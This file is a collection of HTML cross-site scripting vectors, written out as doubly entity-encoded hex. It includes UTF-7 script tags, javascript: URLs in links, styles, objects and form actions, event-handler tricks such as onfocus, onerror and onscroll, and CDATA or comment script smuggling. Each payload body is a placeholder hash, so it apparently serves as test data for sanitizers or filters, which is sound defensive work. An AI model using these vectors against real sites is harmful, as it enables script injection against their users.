amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x2d;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x68;&amp;#x74;&amp;#x6d;&amp;#x6c;&amp;#x3b;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x61;&amp;#x72;&amp;#x73;&amp;#x65;&amp;#x74;&amp;#x3d;&amp;#x55;&amp;#x54;&amp;#x46;&amp;#x2d;&amp;#x37;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x48;&amp;#x45;&amp;#x41;&amp;#x44;&amp;#x3e;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x77;&amp;#x2d;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x34;&amp;#x2d;&amp;#x65;&amp;#x61;&amp;#x61;&amp;#x64;&amp;#x66;&amp;#x33;&amp;#x38;&amp;#x35;&amp;#x66;&amp;#x33;&amp;#x63;&amp;#x34;&amp;#x31;&amp;#x65;&amp;#x35;&amp;#x62;&amp;#x63;&amp;#x32;&amp;#x30;&amp;#x31;&amp;#x38;&amp;#x32;&amp;#x36;&amp;#x39;&amp;#x31;&amp;#x64;&amp;#x31;&amp;#x31;&amp;#x32;&amp;#x38;&amp;#x32;&amp;#x37;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x77;&amp;#x2d;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x34;&amp;#x2d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1;&amp;#x20;&amp;#x68;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x23;&amp;#x62;&amp;#x61;&amp;#x37;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x32;&amp;#x66;&amp;#x31;&amp;#x35;&amp;#x31;&amp;#x61;&amp;#x32;&amp;#x37;&amp;#x62;&amp;#x32;&amp;#x31;&amp;#x62;&amp;#x31;&amp;#x66;&amp;#x65;&amp;#x38;&amp;#x39;&amp;#x32;&amp;#x38;&amp;#x34;&amp;#x63;&amp;#x65;&amp;#x31;&amp;#x36;&amp;#x36;&amp;#x3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e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x20;&amp;#x74;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x3d;&amp;#x22;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x22;&amp;#x20;&amp;#x64;&amp;#x79;&amp;#x6e;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x65;&amp;#x39;&amp;#x64;&amp;#x39;&amp;#x63;&amp;#x61;&amp;#x37;&amp;#x38;&amp;#x61;&amp;#x64;&amp;#x65;&amp;#x65;&amp;#x33;&amp;#x39;&amp;#x33;&amp;#x36;&amp;#x36;&amp;#x61;&amp;#x62;&amp;#x31;&amp;#x35;&amp;#x66;&amp;#x66;&amp;#x38;&amp;#x37;&amp;#x33;&amp;#x30;&amp;#x37;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x31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6;&amp;#x65;&amp;#x34;&amp;#x39;&amp;#x37;&amp;#x61;&amp;#x32;&amp;#x37;&amp;#x61;&amp;#x37;&amp;#x65;&amp;#x33;&amp;#x61;&amp;#x30;&amp;#x32;&amp;#x38;&amp;#x38;&amp;#x31;&amp;#x31;&amp;#x61;&amp;#x62;&amp;#x66;&amp;#x37;&amp;#x31;&amp;#x65;&amp;#x63;&amp;#x30;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x63;&amp;#x30;&amp;#x6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6;&amp;#x7b;&amp;#x62;&amp;#x33;&amp;#x30;&amp;#x62;&amp;#x63;&amp;#x35;&amp;#x36;&amp;#x37;&amp;#x33;&amp;#x32;&amp;#x30;&amp;#x31;&amp;#x38;&amp;#x31;&amp;#x65;&amp;#x35;&amp;#x31;&amp;#x39;&amp;#x36;&amp;#x39;&amp;#x37;&amp;#x32;&amp;#x66;&amp;#x39;&amp;#x33;&amp;#x35;&amp;#x66;&amp;#x32;&amp;#x63;&amp;#x31;&amp;#x65;&amp;#x32;&amp;#x7d;&amp;#x3b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6;&amp;#x7b;&amp;#x39;&amp;#x35;&amp;#x62;&amp;#x36;&amp;#x32;&amp;#x64;&amp;#x30;&amp;#x31;&amp;#x38;&amp;#x32;&amp;#x38;&amp;#x39;&amp;#x62;&amp;#x64;&amp;#x39;&amp;#x31;&amp;#x61;&amp;#x38;&amp;#x38;&amp;#x34;&amp;#x36;&amp;#x34;&amp;#x62;&amp;#x33;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x66;&amp;#x37;&amp;#x65;&amp;#x61;&amp;#x39;&amp;#x7d;&amp;#x3b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1;&amp;#x20;&amp;#x68;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x3d;&amp;#x22;&amp;#x61;&amp;#x62;&amp;#x6f;&amp;#x75;&amp;#x74;&amp;#x3a;&amp;#x35;&amp;#x35;&amp;#x38;&amp;#x64;&amp;#x39;&amp;#x62;&amp;#x38;&amp;#x62;&amp;#x35;&amp;#x35;&amp;#x65;&amp;#x30;&amp;#x37;&amp;#x33;&amp;#x63;&amp;#x31;&amp;#x37;&amp;#x39;&amp;#x30;&amp;#x63;&amp;#x35;&amp;#x66;&amp;#x64;&amp;#x39;&amp;#x37;&amp;#x37;&amp;#x38;&amp;#x37;&amp;#x32;&amp;#x33;&amp;#x62;&amp;#x37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9;&amp;#x6e;&amp;#x64;&amp;#x69;&amp;#x6e;&amp;#x67;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x64;&amp;#x65;&amp;#x61;&amp;#x39;&amp;#x61;&amp;#x37;&amp;#x30;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x66;&amp;#x63;&amp;#x31;&amp;#x66;&amp;#x30;&amp;#x31;&amp;#x63;&amp;#x38;&amp;#x65;&amp;#x39;&amp;#x62;&amp;#x34;&amp;#x63;&amp;#x33;&amp;#x32;&amp;#x63;&amp;#x61;&amp;#x61;&amp;#x65;&amp;#x62;&amp;#x34;&amp;#x62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f;&amp;#x42;&amp;#x4a;&amp;#x45;&amp;#x43;&amp;#x54;&amp;#x20;&amp;#x63;&amp;#x6c;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x63;&amp;#x6c;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3a;&amp;#x2e;&amp;#x2e;&amp;#x2e;&amp;#x22;&amp;#x20;&amp;#x63;&amp;#x6f;&amp;#x64;&amp;#x65;&amp;#x62;&amp;#x61;&amp;#x73;&amp;#x65;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x62;&amp;#x62;&amp;#x63;&amp;#x30;&amp;#x35;&amp;#x66;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x38;&amp;#x36;&amp;#x31;&amp;#x37;&amp;#x34;&amp;#x62;&amp;#x39;&amp;#x35;&amp;#x32;&amp;#x32;&amp;#x65;&amp;#x33;&amp;#x33;&amp;#x64;&amp;#x62;&amp;#x30;&amp;#x63;&amp;#x63;&amp;#x66;&amp;#x37;&amp;#x63;&amp;#x36;&amp;#x32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3;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x3e;&amp;#x3c;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x3c;&amp;#x2f;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x3e;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x34;&amp;#x37;&amp;#x37;&amp;#x62;&amp;#x62;&amp;#x65;&amp;#x32;&amp;#x37;&amp;#x39;&amp;#x37;&amp;#x35;&amp;#x61;&amp;#x37;&amp;#x35;&amp;#x37;&amp;#x38;&amp;#x66;&amp;#x62;&amp;#x38;&amp;#x38;&amp;#x62;&amp;#x66;&amp;#x61;&amp;#x61;&amp;#x35;&amp;#x35;&amp;#x65;&amp;#x38;&amp;#x33;&amp;#x33;&amp;#x61;&amp;#x2f;&amp;#x2f;&amp;#x2d;&amp;#x2d;&amp;#x3e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1;&amp;#x5b;&amp;#x43;&amp;#x44;&amp;#x41;&amp;#x54;&amp;#x41;&amp;#x5b;&amp;#x3c;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x5d;&amp;#x5d;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x65;&amp;#x36;&amp;#x39;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x65;&amp;#x38;&amp;#x32;&amp;#x61;&amp;#x39;&amp;#x38;&amp;#x35;&amp;#x30;&amp;#x35;&amp;#x35;&amp;#x38;&amp;#x61;&amp;#x31;&amp;#x35;&amp;#x63;&amp;#x31;&amp;#x64;&amp;#x36;&amp;#x35;&amp;#x63;&amp;#x30;&amp;#x63;&amp;#x34;&amp;#x36;&amp;#x33;&amp;#x33;&amp;#x2f;&amp;#x2f;&amp;#x2d;&amp;#x2d;&amp;#x3e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21;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x2d;&amp;#x2d;&amp;#x3e;&amp;#x62;&amp;#x64;&amp;#x66;&amp;#x33;&amp;#x61;&amp;#x38;&amp;#x63;&amp;#x31;&amp;#x62;&amp;#x37;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x64;&amp;#x37;&amp;#x38;&amp;#x37;&amp;#x61;&amp;#x39;&amp;#x64;&amp;#x33;&amp;#x39;&amp;#x38;&amp;#x38;&amp;#x39;&amp;#x33;&amp;#x61;&amp;#x31;&amp;#x31;&amp;#x37;&amp;#x34;&amp;#x39;&amp;#x3c;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x2d;&amp;#x2d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8;&amp;#x6d;&amp;#x6c;&amp;#x20;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x22;&amp;#x58;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x61;&amp;#x3e;&amp;#x3c;&amp;#x62;&amp;#x3e;&amp;#x32;&amp;#x37;&amp;#x62;&amp;#x66;&amp;#x34;&amp;#x37;&amp;#x64;&amp;#x38;&amp;#x38;&amp;#x39;&amp;#x39;&amp;#x64;&amp;#x37;&amp;#x35;&amp;#x38;&amp;#x33;&amp;#x39;&amp;#x39;&amp;#x36;&amp;#x31;&amp;#x35;&amp;#x36;&amp;#x35;&amp;#x37;&amp;#x33;&amp;#x38;&amp;#x30;&amp;#x32;&amp;#x33;&amp;#x34;&amp;#x64;&amp;#x37;&amp;#x3b;&amp;#x3c;&amp;#x62;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x61;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x78;&amp;#x6d;&amp;#x6c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4;&amp;#x69;&amp;#x76;&amp;#x20;&amp;#x64;&amp;#x61;&amp;#x74;&amp;#x61;&amp;#x66;&amp;#x6c;&amp;#x64;&amp;#x3d;&amp;#x22;&amp;#x62;&amp;#x22;&amp;#x20;&amp;#x64;&amp;#x61;&amp;#x74;&amp;#x61;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x61;&amp;#x74;&amp;#x61;&amp;#x73;&amp;#x3d;&amp;#x22;&amp;#x68;&amp;#x74;&amp;#x6d;&amp;#x6c;&amp;#x22;&amp;#x20;&amp;#x64;&amp;#x61;&amp;#x74;&amp;#x61;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x23;&amp;#x32;&amp;#x30;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x31;&amp;#x65;&amp;#x34;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x62;&amp;#x62;&amp;#x35;&amp;#x38;&amp;#x64;&amp;#x33;&amp;#x39;&amp;#x61;&amp;#x65;&amp;#x34;&amp;#x39;&amp;#x33;&amp;#x33;&amp;#x32;&amp;#x35;&amp;#x62;&amp;#x61;&amp;#x30;&amp;#x33;&amp;#x38;&amp;#x33;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x64;&amp;#x69;&amp;#x76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8;&amp;#x4d;&amp;#x4c;&amp;#x20;&amp;#x49;&amp;#x44;&amp;#x3d;&amp;#x49;&amp;#x3e;&amp;#x3c;&amp;#x58;&amp;#x3e;&amp;#x3c;&amp;#x43;&amp;#x3e;&amp;#x3c;&amp;#x21;&amp;#x5b;&amp;#x43;&amp;#x44;&amp;#x41;&amp;#x54;&amp;#x41;&amp;#x5b;&amp;#x3c;&amp;#x49;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x5d;&amp;#x5d;&amp;#x3c;&amp;#x21;&amp;#x5b;&amp;#x43;&amp;#x44;&amp;#x41;&amp;#x54;&amp;#x41;&amp;#x5b;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x64;&amp;#x64;&amp;#x32;&amp;#x36;&amp;#x39;&amp;#x63;&amp;#x36;&amp;#x34;&amp;#x37;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x30;&amp;#x32;&amp;#x32;&amp;#x62;&amp;#x63;&amp;#x65;&amp;#x39;&amp;#x64;&amp;#x32;&amp;#x33;&amp;#x62;&amp;#x34;&amp;#x63;&amp;#x32;&amp;#x65;&amp;#x38;&amp;#x65;&amp;#x61;&amp;#x32;&amp;#x36;&amp;#x22;&amp;#x3e;&amp;#x5d;&amp;#x5d;&amp;#x3c;&amp;#x2f;&amp;#x43;&amp;#x3e;&amp;#x3c;&amp;#x58;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x78;&amp;#x6d;&amp;#x6c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6;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x20;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x22;&amp;#x20;&amp;#x2f;&amp;#x3e;&amp;#x3c;&amp;#x62;&amp;#x75;&amp;#x74;&amp;#x74;&amp;#x6f;&amp;#x6e;&amp;#x20;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x22;&amp;#x20;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x61;&amp;#x63;&amp;#x74;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x34;&amp;#x30;&amp;#x35;&amp;#x31;&amp;#x36;&amp;#x63;&amp;#x31;&amp;#x34;&amp;#x63;&amp;#x38;&amp;#x30;&amp;#x62;&amp;#x64;&amp;#x64;&amp;#x33;&amp;#x33;&amp;#x36;&amp;#x63;&amp;#x37;&amp;#x35;&amp;#x32;&amp;#x36;&amp;#x33;&amp;#x65;&amp;#x36;&amp;#x32;&amp;#x32;&amp;#x30;&amp;#x66;&amp;#x37;&amp;#x64;&amp;#x66;&amp;#x22;&amp;#x3e;&amp;#x58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e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x73;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x39;&amp;#x35;&amp;#x35;&amp;#x61;&amp;#x34;&amp;#x31;&amp;#x63;&amp;#x33;&amp;#x39;&amp;#x62;&amp;#x37;&amp;#x64;&amp;#x63;&amp;#x31;&amp;#x65;&amp;#x31;&amp;#x31;&amp;#x30;&amp;#x62;&amp;#x35;&amp;#x39;&amp;#x37;&amp;#x34;&amp;#x37;&amp;#x65;&amp;#x33;&amp;#x66;&amp;#x33;&amp;#x34;&amp;#x30;&amp;#x30;&amp;#x63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3;&amp;#x65;&amp;#x6c;&amp;#x65;&amp;#x63;&amp;#x74;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x73;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x36;&amp;#x37;&amp;#x39;&amp;#x62;&amp;#x34;&amp;#x30;&amp;#x34;&amp;#x62;&amp;#x62;&amp;#x35;&amp;#x63;&amp;#x30;&amp;#x30;&amp;#x63;&amp;#x36;&amp;#x62;&amp;#x39;&amp;#x33;&amp;#x66;&amp;#x38;&amp;#x30;&amp;#x66;&amp;#x63;&amp;#x34;&amp;#x39;&amp;#x33;&amp;#x30;&amp;#x65;&amp;#x65;&amp;#x63;&amp;#x65;&amp;#x65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4;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x61;&amp;#x72;&amp;#x65;&amp;#x61;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x73;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x38;&amp;#x38;&amp;#x37;&amp;#x38;&amp;#x66;&amp;#x34;&amp;#x66;&amp;#x31;&amp;#x31;&amp;#x65;&amp;#x33;&amp;#x64;&amp;#x66;&amp;#x38;&amp;#x64;&amp;#x62;&amp;#x36;&amp;#x38;&amp;#x61;&amp;#x32;&amp;#x66;&amp;#x65;&amp;#x38;&amp;#x38;&amp;#x33;&amp;#x39;&amp;#x37;&amp;#x32;&amp;#x30;&amp;#x31;&amp;#x62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b;&amp;#x65;&amp;#x79;&amp;#x67;&amp;#x65;&amp;#x6e;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x73;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x30;&amp;#x66;&amp;#x30;&amp;#x65;&amp;#x66;&amp;#x66;&amp;#x33;&amp;#x35;&amp;#x36;&amp;#x30;&amp;#x36;&amp;#x38;&amp;#x33;&amp;#x61;&amp;#x34;&amp;#x66;&amp;#x63;&amp;#x36;&amp;#x64;&amp;#x62;&amp;#x32;&amp;#x66;&amp;#x38;&amp;#x61;&amp;#x66;&amp;#x66;&amp;#x33;&amp;#x37;&amp;#x64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e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x62;&amp;#x6c;&amp;#x75;&amp;#x72;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x65;&amp;#x65;&amp;#x64;&amp;#x37;&amp;#x65;&amp;#x35;&amp;#x37;&amp;#x36;&amp;#x33;&amp;#x66;&amp;#x37;&amp;#x62;&amp;#x32;&amp;#x61;&amp;#x61;&amp;#x61;&amp;#x64;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x33;&amp;#x32;&amp;#x33;&amp;#x66;&amp;#x33;&amp;#x38;&amp;#x33;&amp;#x37;&amp;#x61;&amp;#x39;&amp;#x32;&amp;#x30;&amp;#x20;&amp;#x61;&amp;#x75;&amp;#x74;&amp;#x6f;&amp;#x66;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x73;&amp;#x3e;&amp;#x3c;&amp;#x69;&amp;#x6e;&amp;#x70;&amp;#x75;&amp;#x74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6;&amp;#x69;&amp;#x64;&amp;#x65;&amp;#x6f;&amp;#x20;&amp;#x70;&amp;#x6f;&amp;#x73;&amp;#x74;&amp;#x65;&amp;#x72;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x37;&amp;#x30;&amp;#x62;&amp;#x63;&amp;#x36;&amp;#x34;&amp;#x30;&amp;#x32;&amp;#x62;&amp;#x64;&amp;#x34;&amp;#x36;&amp;#x38;&amp;#x34;&amp;#x34;&amp;#x31;&amp;#x63;&amp;#x63;&amp;#x65;&amp;#x61;&amp;#x36;&amp;#x34;&amp;#x33;&amp;#x34;&amp;#x34;&amp;#x32;&amp;#x31;&amp;#x31;&amp;#x31;&amp;#x30;&amp;#x62;&amp;#x31;&amp;#x2f;&amp;#x2f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2;&amp;#x6f;&amp;#x64;&amp;#x79;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x6f;&amp;#x6c;&amp;#x6c;&amp;#x3d;&amp;#x36;&amp;#x63;&amp;#x39;&amp;#x33;&amp;#x63;&amp;#x62;&amp;#x65;&amp;#x65;&amp;#x38;&amp;#x31;&amp;#x35;&amp;#x38;&amp;#x31;&amp;#x33;&amp;#x30;&amp;#x32;&amp;#x39;&amp;#x61;&amp;#x39;&amp;#x63;&amp;#x39;&amp;#x62;&amp;#x66;&amp;#x61;&amp;#x35;&amp;#x66;&amp;#x30;&amp;#x66;&amp;#x30;&amp;#x36;&amp;#x39;&amp;#x61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9;&amp;#x6e;&amp;#x70;&amp;#x75;&amp;#x74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58;&amp;#x3c;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x20;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x69;&amp;#x6e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x63;&amp;#x61;&amp;#x32;&amp;#x32;&amp;#x63;&amp;#x31;&amp;#x63;&amp;#x39;&amp;#x61;&amp;#x65;&amp;#x64;&amp;#x61;&amp;#x66;&amp;#x65;&amp;#x64;&amp;#x39;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x35;&amp;#x30;&amp;#x63;&amp;#x34;&amp;#x34;&amp;#x61;&amp;#x63;&amp;#x36;&amp;#x36;&amp;#x32;&amp;#x38;&amp;#x63;&amp;#x36;&amp;#x3e;&amp;#x3c;&amp;#x69;&amp;#x6e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d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58;&amp;#x3c;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x20;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x3e;&amp;#x3c;&amp;#x69;&amp;#x6e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x3e;&amp;#x3c;&amp;#x62;&amp;#x75;&amp;#x74;&amp;#x74;&amp;#x6f;&amp;#x6e;&amp;#x20;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x3d;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x72;&amp;#x6d;&amp;#x63;&amp;#x68;&amp;#x61;&amp;#x6e;&amp;#x67;&amp;#x65;&amp;#x3d;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x64;&amp;#x39;&amp;#x31;&amp;#x35;&amp;#x31;&amp;#x65;&amp;#x30;&amp;#x33;&amp;#x62;&amp;#x33;&amp;#x37;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x63;&amp;#x38;&amp;#x38;&amp;#x32;&amp;#x63;&amp;#x39;&amp;#x30;&amp;#x65;&amp;#x66;&amp;#x33;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x36;&amp;#x34;&amp;#x33;&amp;#x33;&amp;#x64;&amp;#x3e;&amp;#x58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6;&amp;#x69;&amp;#x64;&amp;#x65;&amp;#x6f;&amp;#x3e;&amp;#x3c;&amp;#x73;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x63;&amp;#x65;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x65;&amp;#x72;&amp;#x72;&amp;#x6f;&amp;#x72;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x38;&amp;#x35;&amp;#x63;&amp;#x31;&amp;#x63;&amp;#x36;&amp;#x64;&amp;#x36;&amp;#x38;&amp;#x63;&amp;#x30;&amp;#x31;&amp;#x39;&amp;#x31;&amp;#x62;&amp;#x36;&amp;#x36;&amp;#x37;&amp;#x37;&amp;#x62;&amp;#x64;&amp;#x32;&amp;#x39;&amp;#x65;&amp;#x36;&amp;#x33;&amp;#x63;&amp;#x64;&amp;#x63;&amp;#x36;&amp;#x61;&amp;#x38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6;&amp;#x69;&amp;#x64;&amp;#x65;&amp;#x6f;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x65;&amp;#x72;&amp;#x72;&amp;#x6f;&amp;#x72;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x62;&amp;#x65;&amp;#x31;&amp;#x31;&amp;#x37;&amp;#x63;&amp;#x36;&amp;#x66;&amp;#x64;&amp;#x32;&amp;#x31;&amp;#x36;&amp;#x63;&amp;#x65;&amp;#x62;&amp;#x37;&amp;#x32;&amp;#x39;&amp;#x66;&amp;#x32;&amp;#x33;&amp;#x30;&amp;#x31;&amp;#x61;&amp;#x31;&amp;#x64;&amp;#x39;&amp;#x39;&amp;#x38;&amp;#x34;&amp;#x62;&amp;#x32;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x73;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x63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f;&amp;#x6e;&amp;#x6f;&amp;#x74;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x3d;&amp;#x36;&amp;#x37;&amp;#x39;&amp;#x33;&amp;#x37;&amp;#x30;&amp;#x37;&amp;#x61;&amp;#x64;&amp;#x36;&amp;#x66;&amp;#x33;&amp;#x37;&amp;#x32;&amp;#x31;&amp;#x33;&amp;#x38;&amp;#x32;&amp;#x34;&amp;#x32;&amp;#x39;&amp;#x33;&amp;#x65;&amp;#x63;&amp;#x35;&amp;#x33;&amp;#x35;&amp;#x62;&amp;#x38;&amp;#x63;&amp;#x64;&amp;#x36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f;&amp;#x6e;&amp;#x6f;&amp;#x74;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x3d;&amp;#x38;&amp;#x38;&amp;#x34;&amp;#x64;&amp;#x66;&amp;#x31;&amp;#x39;&amp;#x63;&amp;#x36;&amp;#x64;&amp;#x62;&amp;#x34;&amp;#x33;&amp;#x62;&amp;#x64;&amp;#x32;&amp;#x61;&amp;#x33;&amp;#x31;&amp;#x65;&amp;#x62;&amp;#x31;&amp;#x38;&amp;#x34;&amp;#x31;&